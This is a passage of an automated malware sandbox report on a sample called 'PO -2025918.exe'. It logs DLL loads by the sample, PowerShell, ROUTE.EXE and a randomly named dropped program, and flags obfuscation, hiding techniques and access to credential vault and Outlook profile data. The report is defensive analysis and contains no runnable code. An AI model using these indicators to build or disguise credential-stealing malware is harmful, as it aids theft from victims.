Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: iconcodecservice.dll Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: winsqlite3.dll Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\PO -2025918.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: PO -2025918.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: PO -2025918.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: route.pdb source: PO -2025918.exe, 00000004.00000002.2124918917.0000000001708000.00000004.00000020.00020000.00000000.sdmp, nWrCyfejRZk.exe, 00000008.00000002.3540473379.0000000000E98000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: nWrCyfejRZk.exe, 00000008.00000002.3539862270.000000000080E000.00000002.00000001.01000000.0000000C.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3539737023.000000000080E000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: wntdll.pdbUGP source: PO -2025918.exe, 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000003.2125155011.0000000002F03000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000003.2127202503.00000000030DF000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: PO -2025918.exe, PO -2025918.exe, 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, ROUTE.EXE, 00000009.00000003.2125155011.0000000002F03000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000003.2127202503.00000000030DF000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: route.pdbGCTL source: PO -2025918.exe, 00000004.00000002.2124918917.0000000001708000.00000004.00000020.00020000.00000000.sdmp, nWrCyfejRZk.exe, 00000008.00000002.3540473379.0000000000E98000.00000004.00000020.00020000.00000000.sdmp
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 0_2_07074236 push dword ptr [ebp+01h]; ret 0_2_0707423B
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 0_2_070879C0 push edx; iretd 0_2_07087AE6
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 0_2_070876D1 push ebx; iretd 0_2_070876DE
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 0_2_0708FCA0 push cs; iretd 0_2_0708FCAE
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 0_2_07087B01 push esp; iretd 0_2_07087B0E
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 0_2_0708E328 push esp; iretd 0_2_0708E336
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 0_2_0708E3C6 push ebx; iretd 0_2_0708E3D6
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 0_2_0708826A push cs; iretd 0_2_0708827E
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 0_2_070882AA push cs; iretd 0_2_070882B6
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 0_2_07087AA6 push edx; iretd 0_2_07087AE6
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 0_2_07088101 push A807062Fh; iretd 0_2_0708810D
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 0_2_070839F2 push esp; iretd 0_2_070839F3
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_00411A5A push edi; iretd 4_2_00411A5B
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_00415A13 push esp; ret 4_2_00415A1E
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_0041623C push edi; retf 4_2_0041623D
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_0040235F push ds; ret 4_2_0040238E
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_004143E3 push ebx; ret 4_2_00414440
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_004143E3 push edi; retf 4_2_00414477
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_0041645E push eax; iretd 4_2_00416462
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_0041446E push edi; retf 4_2_00414477
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_00414436 push ebx; ret 4_2_00414440
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_004034F0 push eax; ret 4_2_004034F2
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_00404616 push edx; ret 4_2_00404617
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_00418EC4 push eax; retf 4_2_00418EC5
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_004187CA push esi; ret 4_2_004187D1
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B6225F pushad ; ret 4_2_01B627F9
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B627FA pushad ; ret 4_2_01B627F9
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B909AD push ecx; mov dword ptr [esp], ecx 4_2_01B909B6
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B6283D push eax; iretd 4_2_01B62858
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B61368 push eax; iretd 4_2_01B61369
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_0329225F pushad ; ret 9_2_032927F9
Source: PO -2025918.exe Static PE information: section name: .text entropy: 7.75594454439522

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
